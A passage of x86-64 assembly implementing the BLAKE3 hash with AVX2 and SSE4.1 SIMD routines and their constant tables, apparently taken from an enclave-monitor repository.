vpxor ymm6, ymm6, ymm11
vpxor ymm7, ymm7, ymm8
vpxor ymm4, ymm4, ymm9
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm5, 12
vpslld ymm5, ymm5, 20
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 12
vpslld ymm6, ymm6, 20
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 12
vpslld ymm7, ymm7, 20
vpor ymm7, ymm7, ymm8
vpsrld ymm8, ymm4, 12
vpslld ymm4, ymm4, 20
vpor ymm4, ymm4, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0x140]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0x180]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x80]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0x1A0]
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxor ymm15, ymm15, ymm0
vpxor ymm12, ymm12, ymm1
vpxor ymm13, ymm13, ymm2
vpxor ymm14, ymm14, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT8+rip]
vpshufb ymm15, ymm15, ymm8
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm13, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm14
vpxor ymm5, ymm5, ymm10
vpxor ymm6, ymm6, ymm11
vpxor ymm7, ymm7, ymm8
vpxor ymm4, ymm4, ymm9
vpxor ymm0, ymm0, ymm8
vpxor ymm1, ymm1, ymm9
vpxor ymm2, ymm2, ymm10
vpxor ymm3, ymm3, ymm11
vpsrld ymm8, ymm5, 7
vpslld ymm5, ymm5, 25
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 7
vpslld ymm6, ymm6, 25
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 7
vpslld ymm7, ymm7, 25
vpor ymm7, ymm7, ymm8
vpsrld ymm8, ymm4, 7
vpslld ymm4, ymm4, 25
vpor ymm4, ymm4, ymm8
vpxor ymm4, ymm4, ymm12
vpxor ymm5, ymm5, ymm13
vpxor ymm6, ymm6, ymm14
vpxor ymm7, ymm7, ymm15
movzx eax, byte ptr [rbp+0x38]
jne 9b
mov rbx, qword ptr [rbp+0x50]
vunpcklps ymm8, ymm0, ymm1
vunpcklps ymm9, ymm2, ymm3
vunpckhps ymm10, ymm0, ymm1
vunpcklps ymm11, ymm4, ymm5
vunpcklps ymm0, ymm6, ymm7
vshufps ymm12, ymm8, ymm9, 78
vblendps ymm1, ymm8, ymm12, 0xCC
vshufps ymm8, ymm11, ymm0, 78
vunpckhps ymm13, ymm2, ymm3
vblendps ymm2, ymm11, ymm8, 0xCC
vblendps ymm3, ymm12, ymm9, 0xCC
vperm2f128 ymm12, ymm1, ymm2, 0x20
vmovups ymmword ptr [rbx], ymm12
vunpckhps ymm14, ymm4, ymm5
vblendps ymm4, ymm8, ymm0, 0xCC
vunpckhps ymm15, ymm6, ymm7
vperm2f128 ymm7, ymm3, ymm4, 0x20
vmovups ymmword ptr [rbx+0x20], ymm7
vshufps ymm5, ymm10, ymm13, 78
vblendps ymm6, ymm5, ymm13, 0xCC
vshufps ymm13, ymm14, ymm15, 78
vblendps ymm10, ymm10, ymm5, 0xCC
vblendps ymm14, ymm14, ymm13, 0xCC
vperm2f128 ymm8, ymm10, ymm14, 0x20
vmovups ymmword ptr [rbx+0x40], ymm8
vblendps ymm15, ymm13, ymm15, 0xCC
vperm2f128 ymm13, ymm6, ymm15, 0x20
vmovups ymmword ptr [rbx+0x60], ymm13
vperm2f128 ymm9, ymm1, ymm2, 0x31
vperm2f128 ymm11, ymm3, ymm4, 0x31
vmovups ymmword ptr [rbx+0x80], ymm9
vperm2f128 ymm14, ymm10, ymm14, 0x31
vperm2f128 ymm15, ymm6, ymm15, 0x31
vmovups ymmword ptr [rbx+0xA0], ymm11
vmovups ymmword ptr [rbx+0xC0], ymm14
vmovups ymmword ptr [rbx+0xE0], ymm15
vmovdqa ymm0, ymmword ptr [rsp+0x220]
vpaddd ymm1, ymm0, ymmword ptr [rsp+0x240]
vmovdqa ymmword ptr [rsp+0x240], ymm1
vpxor ymm0, ymm0, ymmword ptr [CMP_MSB_MASK+rip]
vpxor ymm2, ymm1, ymmword ptr [CMP_MSB_MASK+rip]
vpcmpgtd ymm2, ymm0, ymm2
vmovdqa ymm0, ymmword ptr [rsp+0x260]
vpsubd ymm2, ymm0, ymm2
vmovdqa ymmword ptr [rsp+0x260], ymm2
add rdi, 64
add rbx, 256
mov qword ptr [rbp+0x50], rbx
sub rsi, 8
cmp rsi, 8
jnc 2b
test rsi, rsi
jnz 3f
4:
vzeroupper
mov rsp, rbp
pop rbp
pop rbx
pop r12
pop r13
pop r14
pop r15
ret
.p2align 5
3:
mov rbx, qword ptr [rbp+0x50]
mov r15, qword ptr [rsp+0x2A0]
movzx r13d, byte ptr [rbp+0x38]
movzx r12d, byte ptr [rbp+0x48]
test rsi, 0x4
je 3f
vbroadcasti128 ymm0, xmmword ptr [rcx]
vbroadcasti128 ymm1, xmmword ptr [rcx+0x10]
vmovdqa ymm8, ymm0
vmovdqa ymm9, ymm1
vbroadcasti128 ymm12, xmmword ptr [rsp+0x240]
vbroadcasti128 ymm13, xmmword ptr [rsp+0x260]
vpunpckldq ymm14, ymm12, ymm13
vpunpckhdq ymm15, ymm12, ymm13
vpermq ymm14, ymm14, 0x50
vpermq ymm15, ymm15, 0x50
vbroadcasti128 ymm12, xmmword ptr [BLAKE3_BLOCK_LEN+rip]
vpblendd ymm14, ymm14, ymm12, 0x44
vpblendd ymm15, ymm15, ymm12, 0x44
vmovdqa ymmword ptr [rsp], ymm14
vmovdqa ymmword ptr [rsp+0x20], ymm15
mov r8, qword ptr [rdi]
mov r9, qword ptr [rdi+0x8]
mov r10, qword ptr [rdi+0x10]
mov r11, qword ptr [rdi+0x18]
movzx eax, byte ptr [rbp+0x40]
or eax, r13d
xor edx, edx
.p2align 5
2:
mov r14d, eax
or eax, r12d
add rdx, 64
cmp rdx, r15
cmovne eax, r14d
mov dword ptr [rsp+0x200], eax
vmovups ymm2, ymmword ptr [r8+rdx-0x40]
vinsertf128 ymm2, ymm2, xmmword ptr [r9+rdx-0x40], 0x01
vmovups ymm3, ymmword ptr [r8+rdx-0x30]
vinsertf128 ymm3, ymm3, xmmword ptr [r9+rdx-0x30], 0x01
vshufps ymm4, ymm2, ymm3, 136
vshufps ymm5, ymm2, ymm3, 221
vmovups ymm2, ymmword ptr [r8+rdx-0x20]
vinsertf128 ymm2, ymm2, xmmword ptr [r9+rdx-0x20], 0x01
vmovups ymm3, ymmword ptr [r8+rdx-0x10]
vinsertf128 ymm3, ymm3, xmmword ptr [r9+rdx-0x10], 0x01
vshufps ymm6, ymm2, ymm3, 136
vshufps ymm7, ymm2, ymm3, 221
vpshufd ymm6, ymm6, 0x93
vpshufd ymm7, ymm7, 0x93
vmovups ymm10, ymmword ptr [r10+rdx-0x40]
vinsertf128 ymm10, ymm10, xmmword ptr [r11+rdx-0x40], 0x01
vmovups ymm11, ymmword ptr [r10+rdx-0x30]
vinsertf128 ymm11, ymm11, xmmword ptr [r11+rdx-0x30], 0x01
vshufps ymm12, ymm10, ymm11, 136
vshufps ymm13, ymm10, ymm11, 221
vmovups ymm10, ymmword ptr [r10+rdx-0x20]
vinsertf128 ymm10, ymm10, xmmword ptr [r11+rdx-0x20], 0x01
vmovups ymm11, ymmword ptr [r10+rdx-0x10]
vinsertf128 ymm11, ymm11, xmmword ptr [r11+rdx-0x10], 0x01
vshufps ymm14, ymm10, ymm11, 136
vshufps ymm15, ymm10, ymm11, 221
vpshufd ymm14, ymm14, 0x93
vpshufd ymm15, ymm15, 0x93
prefetcht0 [r8+rdx+0x80]
prefetcht0 [r9+rdx+0x80]
prefetcht0 [r10+rdx+0x80]
prefetcht0 [r11+rdx+0x80]
vpbroadcastd ymm2, dword ptr [rsp+0x200]
vmovdqa ymm3, ymmword ptr [rsp]
vmovdqa ymm11, ymmword ptr [rsp+0x20]
vpblendd ymm3, ymm3, ymm2, 0x88
vpblendd ymm11, ymm11, ymm2, 0x88
vbroadcasti128 ymm2, xmmword ptr [BLAKE3_IV+rip]
vmovdqa ymm10, ymm2
mov al, 7
9:
vpaddd ymm0, ymm0, ymm4
vpaddd ymm8, ymm8, ymm12
vmovdqa ymmword ptr [rsp+0x40], ymm4
nop
vmovdqa ymmword ptr [rsp+0x60], ymm12
nop
vpaddd ymm0, ymm0, ymm1
vpaddd ymm8, ymm8, ymm9
vpxor ymm3, ymm3, ymm0
vpxor ymm11, ymm11, ymm8
vbroadcasti128 ymm4, xmmword ptr [ROT16+rip]
vpshufb ymm3, ymm3, ymm4
vpshufb ymm11, ymm11, ymm4
vpaddd ymm2, ymm2, ymm3
vpaddd ymm10, ymm10, ymm11
vpxor ymm1, ymm1, ymm2
vpxor ymm9, ymm9, ymm10
vpsrld ymm4, ymm1, 12
vpslld ymm1, ymm1, 20
vpor ymm1, ymm1, ymm4
vpsrld ymm4, ymm9, 12
vpslld ymm9, ymm9, 20
vpor ymm9, ymm9, ymm4
vpaddd ymm0, ymm0, ymm5
vpaddd ymm8, ymm8, ymm13
vpaddd ymm0, ymm0, ymm1
vpaddd ymm8, ymm8, ymm9
vmovdqa ymmword ptr [rsp+0x80], ymm5
vmovdqa ymmword ptr [rsp+0xA0], ymm13
vpxor ymm3, ymm3, ymm0
vpxor ymm11, ymm11, ymm8
vbroadcasti128 ymm4, xmmword ptr [ROT8+rip]
vpshufb ymm3, ymm3, ymm4
vpshufb ymm11, ymm11, ymm4
vpaddd ymm2, ymm2, ymm3
vpaddd ymm10, ymm10, ymm11
vpxor ymm1, ymm1, ymm2
vpxor ymm9, ymm9, ymm10
vpsrld ymm4, ymm1, 7
vpslld ymm1, ymm1, 25
vpor ymm1, ymm1, ymm4
vpsrld ymm4, ymm9, 7
vpslld ymm9, ymm9, 25
vpor ymm9, ymm9, ymm4
vpshufd ymm0, ymm0, 0x93
vpshufd ymm8, ymm8, 0x93
vpshufd ymm3, ymm3, 0x4E
vpshufd ymm11, ymm11, 0x4E
vpshufd ymm2, ymm2, 0x39
vpshufd ymm10, ymm10, 0x39
vpaddd ymm0, ymm0, ymm6
vpaddd ymm8, ymm8, ymm14
vpaddd ymm0, ymm0, ymm1
vpaddd ymm8, ymm8, ymm9
vpxor ymm3, ymm3, ymm0
vpxor ymm11, ymm11, ymm8
vbroadcasti128 ymm4, xmmword ptr [ROT16+rip]
vpshufb ymm3, ymm3, ymm4
vpshufb ymm11, ymm11, ymm4
vpaddd ymm2, ymm2, ymm3
vpaddd ymm10, ymm10, ymm11
vpxor ymm1, ymm1, ymm2
vpxor ymm9, ymm9, ymm10
vpsrld ymm4, ymm1, 12
vpslld ymm1, ymm1, 20
vpor ymm1, ymm1, ymm4
vpsrld ymm4, ymm9, 12
vpslld ymm9, ymm9, 20
vpor ymm9, ymm9, ymm4
vpaddd ymm0, ymm0, ymm7
vpaddd ymm8, ymm8, ymm15
vpaddd ymm0, ymm0, ymm1
vpaddd ymm8, ymm8, ymm9
vpxor ymm3, ymm3, ymm0
vpxor ymm11, ymm11, ymm8
vbroadcasti128 ymm4, xmmword ptr [ROT8+rip]
vpshufb ymm3, ymm3, ymm4
vpshufb ymm11, ymm11, ymm4
vpaddd ymm2, ymm2, ymm3
vpaddd ymm10, ymm10, ymm11
vpxor ymm1, ymm1, ymm2
vpxor ymm9, ymm9, ymm10
vpsrld ymm4, ymm1, 7
vpslld ymm1, ymm1, 25
vpor ymm1, ymm1, ymm4
vpsrld ymm4, ymm9, 7
vpslld ymm9, ymm9, 25
vpor ymm9, ymm9, ymm4
vpshufd ymm0, ymm0, 0x39
vpshufd ymm8, ymm8, 0x39
vpshufd ymm3, ymm3, 0x4E
vpshufd ymm11, ymm11, 0x4E
vpshufd ymm2, ymm2, 0x93
vpshufd ymm10, ymm10, 0x93
dec al
je 9f
vmovdqa ymm4, ymmword ptr [rsp+0x40]
vmovdqa ymm5, ymmword ptr [rsp+0x80]
vshufps ymm12, ymm4, ymm5, 214
vpshufd ymm13, ymm4, 0x0F
vpshufd ymm4, ymm12, 0x39
vshufps ymm12, ymm6, ymm7, 250
vpblendd ymm13, ymm13, ymm12, 0xAA
vpunpcklqdq ymm12, ymm7, ymm5
vpblendd ymm12, ymm12, ymm6, 0x88
vpshufd ymm12, ymm12, 0x78
vpunpckhdq ymm5, ymm5, ymm7
vpunpckldq ymm6, ymm6, ymm5
vpshufd ymm7, ymm6, 0x1E
vmovdqa ymmword ptr [rsp+0x40], ymm13
vmovdqa ymmword ptr [rsp+0x80], ymm12
vmovdqa ymm12, ymmword ptr [rsp+0x60]
vmovdqa ymm13, ymmword ptr [rsp+0xA0]
vshufps ymm5, ymm12, ymm13, 214
vpshufd ymm6, ymm12, 0x0F
vpshufd ymm12, ymm5, 0x39
vshufps ymm5, ymm14, ymm15, 250
vpblendd ymm6, ymm6, ymm5, 0xAA
vpunpcklqdq ymm5, ymm15, ymm13
vpblendd ymm5, ymm5, ymm14, 0x88
vpshufd ymm5, ymm5, 0x78
vpunpckhdq ymm13, ymm13, ymm15
vpunpckldq ymm14, ymm14, ymm13
vpshufd ymm15, ymm14, 0x1E
vmovdqa ymm13, ymm6
vmovdqa ymm14, ymm5
vmovdqa ymm5, ymmword ptr [rsp+0x40]
vmovdqa ymm6, ymmword ptr [rsp+0x80]
jmp 9b
9:
vpxor ymm0, ymm0, ymm2
vpxor ymm1, ymm1, ymm3
vpxor ymm8, ymm8, ymm10
vpxor ymm9, ymm9, ymm11
mov eax, r13d
cmp rdx, r15
jne 2b
vmovdqu xmmword ptr [rbx], xmm0
vmovdqu xmmword ptr [rbx+0x10], xmm1
vextracti128 xmmword ptr [rbx+0x20], ymm0, 0x01
vextracti128 xmmword ptr [rbx+0x30], ymm1, 0x01
vmovdqu xmmword ptr [rbx+0x40], xmm8
vmovdqu xmmword ptr [rbx+0x50], xmm9
vextracti128 xmmword ptr [rbx+0x60], ymm8, 0x01
vextracti128 xmmword ptr [rbx+0x70], ymm9, 0x01
vmovaps xmm8, xmmword ptr [rsp+0x280]
vmovaps xmm0, xmmword ptr [rsp+0x240]
vmovaps xmm1, xmmword ptr [rsp+0x250]
vmovaps xmm2, xmmword ptr [rsp+0x260]
vmovaps xmm3, xmmword ptr [rsp+0x270]
vblendvps xmm0, xmm0, xmm1, xmm8
vblendvps xmm2, xmm2, xmm3, xmm8
vmovaps xmmword ptr [rsp+0x240], xmm0
vmovaps xmmword ptr [rsp+0x260], xmm2
add rbx, 128
add rdi, 32
sub rsi, 4
3:
test rsi, 0x2
je 3f
vbroadcasti128 ymm0, xmmword ptr [rcx]
vbroadcasti128 ymm1, xmmword ptr [rcx+0x10]
vmovd xmm13, dword ptr [rsp+0x240]
vpinsrd xmm13, xmm13, dword ptr [rsp+0x260], 1
vpinsrd xmm13, xmm13, dword ptr [BLAKE3_BLOCK_LEN+rip], 2
vmovd xmm14, dword ptr [rsp+0x244]
vpinsrd xmm14, xmm14, dword ptr [rsp+0x264], 1
vpinsrd xmm14, xmm14, dword ptr [BLAKE3_BLOCK_LEN+rip], 2
vinserti128 ymm13, ymm13, xmm14, 0x01
vbroadcasti128 ymm14, xmmword ptr [ROT16+rip]
vbroadcasti128 ymm15, xmmword ptr [ROT8+rip]
mov r8, qword ptr [rdi]
mov r9, qword ptr [rdi+0x8]
movzx eax, byte ptr [rbp+0x40]
or eax, r13d
xor edx, edx
.p2align 5
2:
mov r14d, eax
or eax, r12d
add rdx, 64
cmp rdx, r15
cmovne eax, r14d
mov dword ptr [rsp+0x200], eax
vbroadcasti128 ymm2, xmmword ptr [BLAKE3_IV+rip]
vpbroadcastd ymm8, dword ptr [rsp+0x200]
vpblendd ymm3, ymm13, ymm8, 0x88
vmovups ymm8, ymmword ptr [r8+rdx-0x40]
vinsertf128 ymm8, ymm8, xmmword ptr [r9+rdx-0x40], 0x01
vmovups ymm9, ymmword ptr [r8+rdx-0x30]
vinsertf128 ymm9, ymm9, xmmword ptr [r9+rdx-0x30], 0x01
vshufps ymm4, ymm8, ymm9, 136
vshufps ymm5, ymm8, ymm9, 221
vmovups ymm8, ymmword ptr [r8+rdx-0x20]
vinsertf128 ymm8, ymm8, xmmword ptr [r9+rdx-0x20], 0x01
vmovups ymm9, ymmword ptr [r8+rdx-0x10]
vinsertf128 ymm9, ymm9, xmmword ptr [r9+rdx-0x10], 0x01
vshufps ymm6, ymm8, ymm9, 136
vshufps ymm7, ymm8, ymm9, 221
vpshufd ymm6, ymm6, 0x93
vpshufd ymm7, ymm7, 0x93
mov al, 7
9:
vpaddd ymm0, ymm0, ymm4
vpaddd ymm0, ymm0, ymm1
vpxor ymm3, ymm3, ymm0
vpshufb ymm3, ymm3, ymm14
vpaddd ymm2, ymm2, ymm3
vpxor ymm1, ymm1, ymm2
vpsrld ymm8, ymm1, 12
vpslld ymm1, ymm1, 20
vpor ymm1, ymm1, ymm8
vpaddd ymm0, ymm0, ymm5
vpaddd ymm0, ymm0, ymm1
vpxor ymm3, ymm3, ymm0
vpshufb ymm3, ymm3, ymm15
vpaddd ymm2, ymm2, ymm3
vpxor ymm1, ymm1, ymm2
vpsrld ymm8, ymm1, 7
vpslld ymm1, ymm1, 25
vpor ymm1, ymm1, ymm8
vpshufd ymm0, ymm0, 0x93
vpshufd ymm3, ymm3, 0x4E
vpshufd ymm2, ymm2, 0x39
vpaddd ymm0, ymm0, ymm6
vpaddd ymm0, ymm0, ymm1
vpxor ymm3, ymm3, ymm0
vpshufb ymm3, ymm3, ymm14
vpaddd ymm2, ymm2, ymm3
vpxor ymm1, ymm1, ymm2
vpsrld ymm8, ymm1, 12
vpslld ymm1, ymm1, 20
vpor ymm1, ymm1, ymm8
vpaddd ymm0, ymm0, ymm7
vpaddd ymm0, ymm0, ymm1
vpxor ymm3, ymm3, ymm0
vpshufb ymm3, ymm3, ymm15
vpaddd ymm2, ymm2, ymm3
vpxor ymm1, ymm1, ymm2
vpsrld ymm8, ymm1, 7
vpslld ymm1, ymm1, 25
vpor ymm1, ymm1, ymm8
vpshufd ymm0, ymm0, 0x39
vpshufd ymm3, ymm3, 0x4E
vpshufd ymm2, ymm2, 0x93
dec al
jz 9f
vshufps ymm8, ymm4, ymm5, 214
vpshufd ymm9, ymm4, 0x0F
vpshufd ymm4, ymm8, 0x39
vshufps ymm8, ymm6, ymm7, 250
vpblendd ymm9, ymm9, ymm8, 0xAA
vpunpcklqdq ymm8, ymm7, ymm5
vpblendd ymm8, ymm8, ymm6, 0x88
vpshufd ymm8, ymm8, 0x78
vpunpckhdq ymm5, ymm5, ymm7
vpunpckldq ymm6, ymm6, ymm5
vpshufd ymm7, ymm6, 0x1E
vmovdqa ymm5, ymm9
vmovdqa ymm6, ymm8
jmp 9b
9:
vpxor ymm0, ymm0, ymm2
vpxor ymm1, ymm1, ymm3
mov eax, r13d
cmp rdx, r15
jne 2b
vmovdqu xmmword ptr [rbx], xmm0
vmovdqu xmmword ptr [rbx+0x10], xmm1
vextracti128 xmmword ptr [rbx+0x20], ymm0, 0x01
vextracti128 xmmword ptr [rbx+0x30], ymm1, 0x01
vmovaps ymm8, ymmword ptr [rsp+0x280]
vmovaps ymm0, ymmword ptr [rsp+0x240]
vmovups ymm1, ymmword ptr [rsp+0x248]
vmovaps ymm2, ymmword ptr [rsp+0x260]
vmovups ymm3, ymmword ptr [rsp+0x268]
vblendvps ymm0, ymm0, ymm1, ymm8
vblendvps ymm2, ymm2, ymm3, ymm8
vmovaps ymmword ptr [rsp+0x240], ymm0
vmovaps ymmword ptr [rsp+0x260], ymm2
add rbx, 64
add rdi, 16
sub rsi, 2
3:
test rsi, 0x1
je 4b
vmovdqu xmm0, xmmword ptr [rcx]
vmovdqu xmm1, xmmword ptr [rcx+0x10]
vmovd xmm3, dword ptr [rsp+0x240]
vpinsrd xmm3, xmm3, dword ptr [rsp+0x260], 1
vpinsrd xmm13, xmm3, dword ptr [BLAKE3_BLOCK_LEN+rip], 2
vmovdqa xmm14, xmmword ptr [ROT16+rip]
vmovdqa xmm15, xmmword ptr [ROT8+rip]
mov r8, qword ptr [rdi]
movzx eax, byte ptr [rbp+0x40]
or eax, r13d
xor edx, edx
.p2align 5
2:
mov r14d, eax
or eax, r12d
add rdx, 64
cmp rdx, r15
cmovne eax, r14d
vmovdqa xmm2, xmmword ptr [BLAKE3_IV+rip]
vmovdqa xmm3, xmm13
vpinsrd xmm3, xmm3, eax, 3
vmovups xmm8, xmmword ptr [r8+rdx-0x40]
vmovups xmm9, xmmword ptr [r8+rdx-0x30]
vshufps xmm4, xmm8, xmm9, 136
vshufps xmm5, xmm8, xmm9, 221
vmovups xmm8, xmmword ptr [r8+rdx-0x20]
vmovups xmm9, xmmword ptr [r8+rdx-0x10]
vshufps xmm6, xmm8, xmm9, 136
vshufps xmm7, xmm8, xmm9, 221
vpshufd xmm6, xmm6, 0x93
vpshufd xmm7, xmm7, 0x93
mov al, 7
9:
vpaddd xmm0, xmm0, xmm4
vpaddd xmm0, xmm0, xmm1
vpxor xmm3, xmm3, xmm0
vpshufb xmm3, xmm3, xmm14
vpaddd xmm2, xmm2, xmm3
vpxor xmm1, xmm1, xmm2
vpsrld xmm8, xmm1, 12
vpslld xmm1, xmm1, 20
vpor xmm1, xmm1, xmm8
vpaddd xmm0, xmm0, xmm5
vpaddd xmm0, xmm0, xmm1
vpxor xmm3, xmm3, xmm0
vpshufb xmm3, xmm3, xmm15
vpaddd xmm2, xmm2, xmm3
vpxor xmm1, xmm1, xmm2
vpsrld xmm8, xmm1, 7
vpslld xmm1, xmm1, 25
vpor xmm1, xmm1, xmm8
vpshufd xmm0, xmm0, 0x93
vpshufd xmm3, xmm3, 0x4E
vpshufd xmm2, xmm2, 0x39
vpaddd xmm0, xmm0, xmm6
vpaddd xmm0, xmm0, xmm1
vpxor xmm3, xmm3, xmm0
vpshufb xmm3, xmm3, xmm14
vpaddd xmm2, xmm2, xmm3
vpxor xmm1, xmm1, xmm2
vpsrld xmm8, xmm1, 12
vpslld xmm1, xmm1, 20
vpor xmm1, xmm1, xmm8
vpaddd xmm0, xmm0, xmm7
vpaddd xmm0, xmm0, xmm1
vpxor xmm3, xmm3, xmm0
vpshufb xmm3, xmm3, xmm15
vpaddd xmm2, xmm2, xmm3
vpxor xmm1, xmm1, xmm2
vpsrld xmm8, xmm1, 7
vpslld xmm1, xmm1, 25
vpor xmm1, xmm1, xmm8
vpshufd xmm0, xmm0, 0x39
vpshufd xmm3, xmm3, 0x4E
vpshufd xmm2, xmm2, 0x93
dec al
jz 9f
vshufps xmm8, xmm4, xmm5, 214
vpshufd xmm9, xmm4, 0x0F
vpshufd xmm4, xmm8, 0x39
vshufps xmm8, xmm6, xmm7, 250
vpblendd xmm9, xmm9, xmm8, 0xAA
vpunpcklqdq xmm8, xmm7, xmm5
vpblendd xmm8, xmm8, xmm6, 0x88
vpshufd xmm8, xmm8, 0x78
vpunpckhdq xmm5, xmm5, xmm7
vpunpckldq xmm6, xmm6, xmm5
vpshufd xmm7, xmm6, 0x1E
vmovdqa xmm5, xmm9
vmovdqa xmm6, xmm8
jmp 9b
9:
vpxor xmm0, xmm0, xmm2
vpxor xmm1, xmm1, xmm3
mov eax, r13d
cmp rdx, r15
jne 2b
vmovdqu xmmword ptr [rbx], xmm0
vmovdqu xmmword ptr [rbx+0x10], xmm1
jmp 4b
#ifdef __APPLE__
.static_data
#else
.section .rodata
#endif
.p2align 6
ADD0:
.long 0, 1, 2, 3, 4, 5, 6, 7
ADD1:
.long 8, 8, 8, 8, 8, 8, 8, 8
BLAKE3_IV_0:
.long 0x6A09E667, 0x6A09E667, 0x6A09E667, 0x6A09E667
.long 0x6A09E667, 0x6A09E667, 0x6A09E667, 0x6A09E667
BLAKE3_IV_1:
.long 0xBB67AE85, 0xBB67AE85, 0xBB67AE85, 0xBB67AE85
.long 0xBB67AE85, 0xBB67AE85, 0xBB67AE85, 0xBB67AE85
BLAKE3_IV_2:
.long 0x3C6EF372, 0x3C6EF372, 0x3C6EF372, 0x3C6EF372
.long 0x3C6EF372, 0x3C6EF372, 0x3C6EF372, 0x3C6EF372
BLAKE3_IV_3:
.long 0xA54FF53A, 0xA54FF53A, 0xA54FF53A, 0xA54FF53A
.long 0xA54FF53A, 0xA54FF53A, 0xA54FF53A, 0xA54FF53A
BLAKE3_BLOCK_LEN:
.long 0x00000040, 0x00000040, 0x00000040, 0x00000040
.long 0x00000040, 0x00000040, 0x00000040, 0x00000040
ROT16:
.byte 2, 3, 0, 1, 6, 7, 4, 5, 10, 11, 8, 9, 14, 15, 12, 13
ROT8:
.byte 1, 2, 3, 0, 5, 6, 7, 4, 9, 10, 11, 8, 13, 14, 15, 12
CMP_MSB_MASK:
.long 0x80000000, 0x80000000, 0x80000000, 0x80000000
.long 0x80000000, 0x80000000, 0x80000000, 0x80000000
BLAKE3_IV:
.long 0x6A09E667, 0xBB67AE85, 0x3C6EF372, 0xA54FF53A
|
mit-enclaves/argos-monitor | 61,143 | C/libraries/sdktyche/loader/blake3_sse41_x86-64_unix.S | #if defined(__ELF__) && defined(__linux__)
.section .note.GNU-stack,"",%progbits
#endif
#if defined(__ELF__) && defined(__CET__) && defined(__has_include)
#if __has_include(<cet.h>)
#include <cet.h>
#endif
#endif
#if !defined(_CET_ENDBR)
#define _CET_ENDBR
#endif
.intel_syntax noprefix
.global blake3_hash_many_sse41
.global _blake3_hash_many_sse41
.global blake3_compress_in_place_sse41
.global _blake3_compress_in_place_sse41
.global blake3_compress_xof_sse41
.global _blake3_compress_xof_sse41
#ifdef __APPLE__
.text
#else
.section .text
#endif
.p2align 6
_blake3_hash_many_sse41:
blake3_hash_many_sse41:
_CET_ENDBR
push r15
push r14
push r13
push r12
push rbx
push rbp
mov rbp, rsp
sub rsp, 360
and rsp, 0xFFFFFFFFFFFFFFC0
neg r9d
movd xmm0, r9d
pshufd xmm0, xmm0, 0x00
movdqa xmmword ptr [rsp+0x130], xmm0
movdqa xmm1, xmm0
pand xmm1, xmmword ptr [ADD0+rip]
pand xmm0, xmmword ptr [ADD1+rip]
movdqa xmmword ptr [rsp+0x150], xmm0
movd xmm0, r8d
pshufd xmm0, xmm0, 0x00
paddd xmm0, xmm1
movdqa xmmword ptr [rsp+0x110], xmm0
pxor xmm0, xmmword ptr [CMP_MSB_MASK+rip]
pxor xmm1, xmmword ptr [CMP_MSB_MASK+rip]
pcmpgtd xmm1, xmm0
shr r8, 32
movd xmm2, r8d
pshufd xmm2, xmm2, 0x00
psubd xmm2, xmm1
movdqa xmmword ptr [rsp+0x120], xmm2
mov rbx, qword ptr [rbp+0x50]
mov r15, rdx
shl r15, 6
movzx r13d, byte ptr [rbp+0x38]
movzx r12d, byte ptr [rbp+0x48]
cmp rsi, 4
jc 3f
2:
movdqu xmm3, xmmword ptr [rcx]
pshufd xmm0, xmm3, 0x00
pshufd xmm1, xmm3, 0x55
pshufd xmm2, xmm3, 0xAA
pshufd xmm3, xmm3, 0xFF
movdqu xmm7, xmmword ptr [rcx+0x10]
pshufd xmm4, xmm7, 0x00
pshufd xmm5, xmm7, 0x55
pshufd xmm6, xmm7, 0xAA
pshufd xmm7, xmm7, 0xFF
mov r8, qword ptr [rdi]
mov r9, qword ptr [rdi+0x8]
mov r10, qword ptr [rdi+0x10]
mov r11, qword ptr [rdi+0x18]
movzx eax, byte ptr [rbp+0x40]
or eax, r13d
xor edx, edx
9:
mov r14d, eax
or eax, r12d
add rdx, 64
cmp rdx, r15
cmovne eax, r14d
movdqu xmm8, xmmword ptr [r8+rdx-0x40]
movdqu xmm9, xmmword ptr [r9+rdx-0x40]
movdqu xmm10, xmmword ptr [r10+rdx-0x40]
movdqu xmm11, xmmword ptr [r11+rdx-0x40]
movdqa xmm12, xmm8
punpckldq xmm8, xmm9
punpckhdq xmm12, xmm9
movdqa xmm14, xmm10
punpckldq xmm10, xmm11
punpckhdq xmm14, xmm11
movdqa xmm9, xmm8
punpcklqdq xmm8, xmm10
punpckhqdq xmm9, xmm10
movdqa xmm13, xmm12
punpcklqdq xmm12, xmm14
punpckhqdq xmm13, xmm14
movdqa xmmword ptr [rsp], xmm8
movdqa xmmword ptr [rsp+0x10], xmm9
movdqa xmmword ptr [rsp+0x20], xmm12
movdqa xmmword ptr [rsp+0x30], xmm13
movdqu xmm8, xmmword ptr [r8+rdx-0x30]
movdqu xmm9, xmmword ptr [r9+rdx-0x30]
movdqu xmm10, xmmword ptr [r10+rdx-0x30]
movdqu xmm11, xmmword ptr [r11+rdx-0x30]
movdqa xmm12, xmm8
punpckldq xmm8, xmm9
punpckhdq xmm12, xmm9
movdqa xmm14, xmm10
punpckldq xmm10, xmm11
punpckhdq xmm14, xmm11
movdqa xmm9, xmm8
punpcklqdq xmm8, xmm10
punpckhqdq xmm9, xmm10
movdqa xmm13, xmm12
punpcklqdq xmm12, xmm14
punpckhqdq xmm13, xmm14
movdqa xmmword ptr [rsp+0x40], xmm8
movdqa xmmword ptr [rsp+0x50], xmm9
movdqa xmmword ptr [rsp+0x60], xmm12
movdqa xmmword ptr [rsp+0x70], xmm13
movdqu xmm8, xmmword ptr [r8+rdx-0x20]
movdqu xmm9, xmmword ptr [r9+rdx-0x20]
movdqu xmm10, xmmword ptr [r10+rdx-0x20]
movdqu xmm11, xmmword ptr [r11+rdx-0x20]
movdqa xmm12, xmm8
punpckldq xmm8, xmm9
